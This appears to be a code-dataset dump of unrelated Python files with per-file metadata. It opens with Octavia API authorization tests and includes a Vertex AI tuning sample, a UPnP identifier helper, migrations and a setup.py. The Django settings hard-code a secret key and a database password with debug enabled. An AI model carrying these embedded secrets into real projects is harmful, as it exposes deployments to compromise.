'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.get(self.AZPS_PATH)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
api_list = response.json.get(self.root_tag_list)
self.assertEqual(2, len(api_list))
def test_get_all_not_authorized(self):
fp1 = self.create_availability_zone_profile(
'test1', 'noop_driver', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(fp1.get('id')))
fp2 = self.create_availability_zone_profile(
'test2', 'noop_driver-alt', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(fp2.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
self.get(self.AZPS_PATH, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
def test_update(self):
azp = self.create_availability_zone_profile(
'test_profile', 'noop_driver', '{"x": "y"}')
update_data = {'name': 'the_profile',
constants.PROVIDER_NAME: 'noop_driver-alt',
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(update_data)
self.put(self.AZP_PATH.format(azp_id=azp.get('id')), body)
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('the_profile', response.get('name'))
self.assertEqual('noop_driver-alt',
response.get(constants.PROVIDER_NAME))
self.assertEqual('{"hello": "world"}',
response.get(constants.AVAILABILITY_ZONE_DATA))
def test_update_deleted_id(self):
update_data = {'name': 'fake_profile'}
body = self._build_body(update_data)
response = self.put(self.AZP_PATH.format(azp_id=constants.NIL_UUID),
body, status=404)
self.assertEqual('Availability Zone Profile {} not found.'.format(
constants.NIL_UUID), response.json.get('faultstring'))
def test_update_nothing(self):
azp = self.create_availability_zone_profile(
'test_profile', 'noop_driver', '{"x": "y"}')
body = self._build_body({})
self.put(self.AZP_PATH.format(azp_id=azp.get('id')), body)
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('test_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}',
response.get(constants.AVAILABILITY_ZONE_DATA))
def test_update_name_none(self):
self._test_update_param_none(constants.NAME)
def test_update_provider_name_none(self):
self._test_update_param_none(constants.PROVIDER_NAME)
def test_update_availability_zone_data_none(self):
self._test_update_param_none(constants.AVAILABILITY_ZONE_DATA)
def _test_update_param_none(self, param_name):
azp = self.create_availability_zone_profile(
'test_profile', 'noop_driver', '{"x": "y"}')
expect_error_msg = ("None is not a valid option for %s" %
param_name)
body = self._build_body({param_name: None})
response = self.put(self.AZP_PATH.format(azp_id=azp.get('id')), body,
status=400)
self.assertEqual(expect_error_msg, response.json['faultstring'])
def test_update_no_availability_zone_data(self):
azp = self.create_availability_zone_profile(
'test_profile', 'noop_driver', '{"x": "y"}')
update_data = {'name': 'the_profile',
constants.PROVIDER_NAME: 'noop_driver-alt'}
body = self._build_body(update_data)
response = self.put(self.AZP_PATH.format(azp_id=azp.get('id')), body)
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('the_profile', response.get('name'))
self.assertEqual('noop_driver-alt',
response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}',
response.get(constants.AVAILABILITY_ZONE_DATA))
def test_update_authorized(self):
azp = self.create_availability_zone_profile(
'test_profile', 'noop_driver', '{"x": "y"}')
update_data = {'name': 'the_profile',
constants.PROVIDER_NAME: 'noop_driver-alt',
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(update_data)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.put(self.AZP_PATH.format(azp_id=azp.get('id')),
body)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('the_profile', response.get('name'))
self.assertEqual('noop_driver-alt',
response.get(constants.PROVIDER_NAME))
self.assertEqual('{"hello": "world"}',
response.get(constants.AVAILABILITY_ZONE_DATA))
def test_update_not_authorized(self):
azp = self.create_availability_zone_profile(
'test_profile', 'noop_driver', '{"x": "y"}')
update_data = {'name': 'the_profile', constants.PROVIDER_NAME: 'amp',
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(update_data)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
response = self.put(self.AZP_PATH.format(azp_id=azp.get('id')),
body, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('test_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}',
response.get(constants.AVAILABILITY_ZONE_DATA))
def test_update_in_use(self):
azp = self.create_availability_zone_profile(
'test_profile', 'noop_driver', '{"x": "y"}')
self.create_availability_zone(
'name1', 'description', azp.get('id'), True)
# Test updating provider while in use is not allowed
update_data = {'name': 'the_profile',
constants.PROVIDER_NAME: 'noop_driver-alt'}
body = self._build_body(update_data)
response = self.put(self.AZP_PATH.format(azp_id=azp.get('id')), body,
status=409)
err_msg = ("Availability Zone Profile {} is in use and cannot be "
"modified.".format(azp.get('id')))
self.assertEqual(err_msg, response.json.get('faultstring'))
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('test_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}',
response.get(constants.AVAILABILITY_ZONE_DATA))
# Test updating availability zone data while in use is not allowed
update_data = {'name': 'the_profile',
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(update_data)
response = self.put(self.AZP_PATH.format(azp_id=azp.get('id')), body,
status=409)
err_msg = ("Availability Zone Profile {} is in use and cannot be "
"modified.".format(azp.get('id')))
self.assertEqual(err_msg, response.json.get('faultstring'))
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('test_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}',
response.get(constants.AVAILABILITY_ZONE_DATA))
# Test that you can still update the name when in use
update_data = {'name': 'the_profile'}
body = self._build_body(update_data)
response = self.put(self.AZP_PATH.format(azp_id=azp.get('id')), body)
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('the_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}',
response.get(constants.AVAILABILITY_ZONE_DATA))
def test_delete(self):
azp = self.create_availability_zone_profile(
'test1', 'noop_driver', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(azp.get('id')))
self.delete(self.AZP_PATH.format(azp_id=azp.get('id')))
response = self.get(self.AZP_PATH.format(
azp_id=azp.get('id')), status=404)
err_msg = "Availability Zone Profile %s not found." % azp.get('id')
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_delete_deleted_id(self):
response = self.delete(self.AZP_PATH.format(azp_id=constants.NIL_UUID),
status=404)
self.assertEqual('Availability Zone Profile {} not found.'.format(
constants.NIL_UUID), response.json.get('faultstring'))
def test_delete_nonexistent_id(self):
response = self.delete(self.AZP_PATH.format(azp_id='bogus_id'),
status=404)
self.assertEqual('Availability Zone Profile bogus_id not found.',
response.json.get('faultstring'))
def test_delete_authorized(self):
azp = self.create_availability_zone_profile(
'test1', 'noop_driver', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(azp.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
self.delete(self.AZP_PATH.format(azp_id=azp.get('id')))
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(self.AZP_PATH.format(
azp_id=azp.get('id')), status=404)
err_msg = "Availability Zone Profile %s not found." % azp.get('id')
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_delete_not_authorized(self):
azp = self.create_availability_zone_profile(
'test1', 'noop_driver', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(azp.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
response = self.delete(self.AZP_PATH.format(
azp_id=azp.get('id')), status=403)
api_azp = response.json
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, api_azp)
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('test1', response.get('name'))
def test_delete_in_use(self):
azp = self.create_availability_zone_profile(
'test1', 'noop_driver', '{"compute_zone": "my_az_1"}')
self.create_availability_zone(
'name1', 'description', azp.get('id'), True)
response = self.delete(self.AZP_PATH.format(azp_id=azp.get('id')),
status=409)
err_msg = ("Availability Zone Profile {} is in use and cannot be "
"modified.".format(azp.get('id')))
self.assertEqual(err_msg, response.json.get('faultstring'))
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('test1', response.get('name'))
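# Illustrative sketch (added; not part of the upstream test module): the JSON body
# that _build_body() wraps for these tests nests the payload under the root tag.
# The values below are placeholders only.
EXAMPLE_CREATE_BODY = {
    'availability_zone_profile': {
        'name': 'example-profile',
        'provider_name': 'noop_driver',
        'availability_zone_data': '{"compute_zone": "example-az"}',
    }
}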
|
apache-2.0
| 1,955,087,208,449,069,000
| 49.337861
| 79
| 0.58835
| false
| 3.637914
| true
| false
| false
|
jinhong666/Python
|
AvailabilityMonitor/DbAccess/dbaccesser.py
|
1
|
1073
|
#!/usr/bin/python
from Tools.datetimetool import DateTimeTool
import logging
from DbAccess import DBHelper
SOCKET_TIMEOUT = 1
class DbAccesser:
def __init__(self,host,user,pwd,db):
self._dbHelper = DBHelper(host,user,pwd,db)
self._logger = logging.getLogger("root")
def RecordMonitor(self,domain,url,ip,status,isVip):
sqlStr = 'insert into MonitorRecord(domain,WebIP,MonStatus,monTime,isVip,monUrl) VALUES (%s,%s,%s,%s,%s,%s)'
params = (domain,ip,status,DateTimeTool.GetCurrentTimeStr(),isVip,url)
try:
self._dbHelper.ExcuteNoneQuery(sqlStr,params)
except Exception as e:
logging.error("记录监控信息错误",e.args[1])
def GetDayStat(self,domain,url,ip,isVip):
sqlStr = "select count(1) from DayStat where Domain=%s and ip=%s and isVip=%s and monUrl=%s"
params = (domain,ip,isVip,url)
try:
            return self._dbHelper.ExcuteScalarQuery(sqlStr,params)
except Exception as e:
            self._logger.error('Error getting daily statistics: %s', e.args[1])
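# Illustrative usage sketch (added; not part of the original module).  The host,
# credentials and arguments below are placeholders.
# accesser = DbAccesser('127.0.0.1', 'monitor_user', 'secret', 'monitor_db')
# accesser.RecordMonitor('example.com', 'http://example.com/', '10.0.0.1', 200, 0)
# day_count = accesser.GetDayStat('example.com', 'http://example.com/', '10.0.0.1', 0)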
|
apache-2.0
| 5,166,579,525,175,662,000
| 33.633333
| 116
| 0.6564
| false
| 3.12012
| false
| false
| false
|
googleapis/python-aiplatform
|
samples/snippets/create_hyperparameter_tuning_job_python_package_sample.py
|
1
|
3771
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START aiplatform_create_hyperparameter_tuning_job_python_package_sample]
from google.cloud import aiplatform
def create_hyperparameter_tuning_job_python_package_sample(
project: str,
display_name: str,
executor_image_uri: str,
package_uri: str,
python_module: str,
location: str = "us-central1",
api_endpoint: str = "us-central1-aiplatform.googleapis.com",
):
# The AI Platform services require regional API endpoints.
client_options = {"api_endpoint": api_endpoint}
# Initialize client that will be used to create and send requests.
# This client only needs to be created once, and can be reused for multiple requests.
client = aiplatform.gapic.JobServiceClient(client_options=client_options)
# study_spec
metric = {
"metric_id": "val_rmse",
"goal": aiplatform.gapic.StudySpec.MetricSpec.GoalType.MINIMIZE,
}
conditional_parameter_decay = {
"parameter_spec": {
"parameter_id": "decay",
"double_value_spec": {"min_value": 1e-07, "max_value": 1},
"scale_type": aiplatform.gapic.StudySpec.ParameterSpec.ScaleType.UNIT_LINEAR_SCALE,
},
"parent_discrete_values": {"values": [32, 64]},
}
conditional_parameter_learning_rate = {
"parameter_spec": {
"parameter_id": "learning_rate",
"double_value_spec": {"min_value": 1e-07, "max_value": 1},
"scale_type": aiplatform.gapic.StudySpec.ParameterSpec.ScaleType.UNIT_LINEAR_SCALE,
},
"parent_discrete_values": {"values": [4, 8, 16]},
}
parameter = {
"parameter_id": "batch_size",
"discrete_value_spec": {"values": [4, 8, 16, 32, 64, 128]},
"scale_type": aiplatform.gapic.StudySpec.ParameterSpec.ScaleType.UNIT_LINEAR_SCALE,
"conditional_parameter_specs": [
conditional_parameter_decay,
conditional_parameter_learning_rate,
],
}
# trial_job_spec
machine_spec = {
"machine_type": "n1-standard-4",
"accelerator_type": aiplatform.gapic.AcceleratorType.NVIDIA_TESLA_K80,
"accelerator_count": 1,
}
worker_pool_spec = {
"machine_spec": machine_spec,
"replica_count": 1,
"python_package_spec": {
"executor_image_uri": executor_image_uri,
"package_uris": [package_uri],
"python_module": python_module,
"args": [],
},
}
# hyperparameter_tuning_job
hyperparameter_tuning_job = {
"display_name": display_name,
"max_trial_count": 4,
"parallel_trial_count": 2,
"study_spec": {
"metrics": [metric],
"parameters": [parameter],
"algorithm": aiplatform.gapic.StudySpec.Algorithm.RANDOM_SEARCH,
},
"trial_job_spec": {"worker_pool_specs": [worker_pool_spec]},
}
parent = f"projects/{project}/locations/{location}"
response = client.create_hyperparameter_tuning_job(
parent=parent, hyperparameter_tuning_job=hyperparameter_tuning_job
)
print("response:", response)
# [END aiplatform_create_hyperparameter_tuning_job_python_package_sample]
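# Illustrative invocation (added; not part of the published sample).  All values are
# placeholders for a hypothetical project and a pre-built training package.
# create_hyperparameter_tuning_job_python_package_sample(
#     project="example-project",
#     display_name="example-hp-tuning-job",
#     executor_image_uri="us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-1:latest",
#     package_uri="gs://example-bucket/trainer-0.1.tar.gz",
#     python_module="trainer.task",
# )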
|
apache-2.0
| 1,663,557,871,573,529,000
| 35.970588
| 95
| 0.638823
| false
| 3.601719
| false
| false
| false
|
dNG-git/pas_upnp
|
src/dNG/data/upnp/identifier_mixin.py
|
1
|
5198
|
# -*- coding: utf-8 -*-
"""
direct PAS
Python Application Services
----------------------------------------------------------------------------
(C) direct Netware Group - All rights reserved
https://www.direct-netware.de/redirect?pas;upnp
The following license agreement remains valid unless any additions or
changes are being made by direct Netware Group in a written form.
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or (at your
option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
more details.
You should have received a copy of the GNU General Public License along with
this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
----------------------------------------------------------------------------
https://www.direct-netware.de/redirect?licenses;gpl
----------------------------------------------------------------------------
#echo(pasUPnPVersion)#
#echo(__FILEPATH__)#
"""
import re
from dNG.data.binary import Binary
class IdentifierMixin(object):
"""
"IdentifierMixin" implements methods to get UPnP identifier values.
:author: direct Netware Group et al.
:copyright: direct Netware Group - All rights reserved
:package: pas
:subpackage: upnp
:since: v0.2.00
:license: https://www.direct-netware.de/redirect?licenses;gpl
GNU General Public License 2
"""
RE_USN_URN = re.compile("^urn:(.+):(.+):(.*):(.*)$", re.I)
"""
URN RegExp
"""
def __init__(self):
"""
Constructor __init__(IdentifierMixin)
:since: v0.2.00
"""
self.identifier = None
"""
Parsed UPnP identifier
"""
#
def _get_identifier(self):
"""
Returns the UPnP USN string.
:return: (dict) Parsed UPnP identifier; None if not set
:since: v0.2.00
"""
return self.identifier
#
def get_type(self):
"""
Returns the UPnP service type.
:return: (str) Service type
:since: v0.2.00
"""
return self.identifier['type']
#
def get_udn(self):
"""
Returns the UPnP UDN value.
:return: (str) UPnP service UDN
:since: v0.2.00
"""
return self.identifier['uuid']
#
def get_upnp_domain(self):
"""
Returns the UPnP service specification domain.
:return: (str) UPnP service specification domain
:since: v0.2.00
"""
return self.identifier['domain']
#
def get_urn(self):
"""
Returns the UPnP serviceType value.
:return: (str) UPnP URN
:since: v0.2.00
"""
return self.identifier['urn']
#
def get_usn(self):
"""
Returns the UPnP USN value.
:return: (str) UPnP USN
:since: v0.2.00
"""
return "uuid:{0}::urn:{1}".format(self.get_udn(), self.get_urn())
#
def get_version(self):
"""
Returns the UPnP device type version.
:return: (str) Device type version; None if undefined
:since: v0.2.00
"""
return self.identifier.get("version")
#
def _set_identifier(self, identifier):
"""
Sets the UPnP USN identifier.
:param identifier: Parsed UPnP identifier
:since: v0.2.00
"""
self.identifier = identifier
#
@staticmethod
def get_identifier(usn, bootid = None, configid = None):
"""
Parses the given UPnP USN string.
:param usn: UPnP USN
:param bootid: UPnP bootId (bootid.upnp.org) if any
:param configid: UPnP configId (configid.upnp.org) if any
:return: (dict) Parsed UPnP identifier; None on error
:since: v0.2.00
"""
usn = Binary.str(usn)
if (type(usn) == str):
usn_data = usn.split("::", 1)
device_id = usn_data[0].lower().replace("-", "")
        else: return None  # not a parsable USN string
if (device_id.startswith("uuid:")):
device_id = device_id[5:]
_return = { "device": device_id,
"bootid": None,
"configid": None,
"uuid": usn_data[0][5:],
"class": "unknown",
"usn": usn
}
if (bootid is not None and configid is not None):
_return['bootid'] = bootid
_return['configid'] = configid
#
re_result = (IdentifierMixin.RE_USN_URN.match(usn_data[1]) if (len(usn_data) > 1) else None)
if (re_result is not None):
_return['urn'] = usn_data[1][4:]
_return['domain'] = re_result.group(1)
_return['class'] = re_result.group(2)
_return['type'] = re_result.group(3)
_return['version'] = re_result.group(4)
elif (usn[-17:].lower() == "::upnp:rootdevice"): _return['class'] = "rootdevice"
else: _return = None
return _return
#
#
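# Illustrative sketch (added; not part of the upstream module): parsing a typical
# USN with the static helper above.  The UUID is an arbitrary example value.
# ident = IdentifierMixin.get_identifier(
#     "uuid:2fac1234-31f8-11b4-a222-08002b34c003::"
#     "urn:schemas-upnp-org:device:MediaServer:1")
# # ident['uuid']    -> '2fac1234-31f8-11b4-a222-08002b34c003'
# # ident['domain']  -> 'schemas-upnp-org'
# # ident['class']   -> 'device'
# # ident['type']    -> 'MediaServer'
# # ident['version'] -> '1'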
|
gpl-2.0
| 28,591,505,664,425,940
| 24.111111
| 104
| 0.563678
| false
| 3.697013
| true
| false
| false
|
JackyChou/SGRS
|
SGRS/common_settings.py
|
1
|
3285
|
"""
Django settings for SGRS project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^2oeytt80lcv67-b7o3x4dav&x08ao&@d3k01-p8=s=ygbgz5u'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'GeneralReport',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'SGRS.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'SGRS.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'SGRS_db',
'USER': 'jacky',
'PASSWORD': 'jacky',
'HOST': '127.0.0.1',
'PORT': '',
}
}
DB_FOR_CHOICES = (
('default', u'test db',),
)
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'query_result_cache',
'KEY_PREFIX': 'SGRS',
'TIMEOUT':60 * 30,
'MAX_ENTRIES':100,
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, "static")
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'GeneralReport.SGRSUser'
LOGIN_URL = '/sgrs/login/'
import time, datetime
CLEAN_TMP_FILE_TIMESTAMP = int(time.mktime(
(datetime.date.today() - datetime.timedelta(days=1)).timetuple()
))
|
gpl-2.0
| 4,849,460,929,883,837,000
| 24.269231
| 71
| 0.666971
| false
| 3.355465
| false
| false
| false
|
miguelgrinberg/microblog
|
migrations/versions/780739b227a7_posts_table.py
|
1
|
1057
|
"""posts table
Revision ID: 780739b227a7
Revises: e517276bb1c2
Create Date: 2017-09-11 12:23:25.496587
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '780739b227a7'
down_revision = 'e517276bb1c2'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('post',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('body', sa.String(length=140), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_post_timestamp'), 'post', ['timestamp'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_post_timestamp'), table_name='post')
op.drop_table('post')
# ### end Alembic commands ###
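# Illustrative note (added): with Flask-Migrate this revision is normally applied
# from the command line rather than imported directly, e.g.
#   flask db upgrade      # runs upgrade() above
#   flask db downgrade    # runs downgrade() above
# (plain Alembic equivalents: `alembic upgrade head` / `alembic downgrade -1`)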
|
mit
| -2,497,830,188,465,469,400
| 27.567568
| 83
| 0.663198
| false
| 3.272446
| false
| false
| false
|
googleapis/googleapis-gen
|
google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/enums/types/merchant_center_link_status.py
|
1
|
1291
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v8.enums',
marshal='google.ads.googleads.v8',
manifest={
'MerchantCenterLinkStatusEnum',
},
)
class MerchantCenterLinkStatusEnum(proto.Message):
r"""Container for enum describing possible statuses of a Google
Merchant Center link.
"""
class MerchantCenterLinkStatus(proto.Enum):
r"""Describes the possible statuses for a link between a Google
Ads customer and a Google Merchant Center account.
"""
UNSPECIFIED = 0
UNKNOWN = 1
ENABLED = 2
PENDING = 3
__all__ = tuple(sorted(__protobuf__.manifest))
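# Illustrative usage sketch (added; not part of the generated module): the nested
# enum behaves like a standard IntEnum.
# status = MerchantCenterLinkStatusEnum.MerchantCenterLinkStatus.ENABLED
# status.name   -> 'ENABLED'
# status.value  -> 2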
|
apache-2.0
| 245,458,820,869,564,640
| 29.738095
| 74
| 0.693261
| false
| 4.085443
| false
| false
| false
|
ActiDoo/gamification-engine
|
setup.py
|
1
|
2935
|
import os
import re
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'README.txt')) as f:
README = f.read()
with open(os.path.join(here, 'CHANGES.txt')) as f:
CHANGES = f.read()
requires = [
'pyramid',
'pyramid_chameleon',
'pyramid_debugtoolbar',
'pyramid_tm',
'SQLAlchemy',
'transaction',
'zope.sqlalchemy',
'waitress',
'pytz',
'dogpile.cache',
'pyramid_dogpile_cache',
'Flask>=0.10.1',
'flask-admin',
'psycopg2',
'pymemcache',
'mock',
'alembic',
'raven',
'jsl',
'jsonschema',
'pyparsing',
'python-crontab',
'croniter',
'zope.interface',
'argon2'
]
version = ''
with open('gengine/__init__.py', 'r') as fd:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
fd.read(), re.MULTILINE).group(1)
if not version:
raise RuntimeError('Cannot find version information')
setup(name='gamification-engine',
version=version,
description='The Gamification-Engine (gengine) provides an API for integrating any kinds of gamification features.',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Framework :: Pyramid",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
"Topic :: Software Development :: Libraries",
"Programming Language :: Python :: 3.6",
"License :: OSI Approved :: MIT License"
],
author='Marcel Sander, Jens Janiuk, Matthias Feldotto',
author_email='marcel@gamification-software.com',
license='MIT',
url='https://www.gamification-software.com',
keywords='web wsgi bfg pylons pyramid gamification',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
test_suite='gengine',
install_requires=requires,
extras_require={
"auth": [
'argon2'
],
"pushes": [
'tapns3',
'python-gcm',
],
"testing": [
'testing.postgresql',
'testing.redis',
'names'
]
},
entry_points="""\
[paste.app_factory]
main = gengine:main
[console_scripts]
initialize_gengine_db = gengine.maintenance.scripts.initializedb:main
generate_gengine_erd = gengine.maintenance.scripts.generate_erd:main
generate_gengine_revision = gengine.maintenance.scripts.generate_revision:main
gengine_push_messages = gengine.maintenance.scripts.push_messages:main
gengine_scheduler_beat = gengine.maintenance.scripts.scheduler_beat:main
gengine_scheduler_worker = gengine.maintenance.scripts.scheduler_worker:main
[redgalaxy.plugins]
gengine = gengine:redgalaxy
""",
)
|
mit
| -1,113,054,953,801,862,000
| 28.646465
| 122
| 0.600341
| false
| 3.618989
| false
| false
| false
|
keseldude/brobot
|
brobot/core/bot.py
|
1
|
10481
|
#===============================================================================
# brobot
# Copyright (C) 2010 Michael Keselman
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
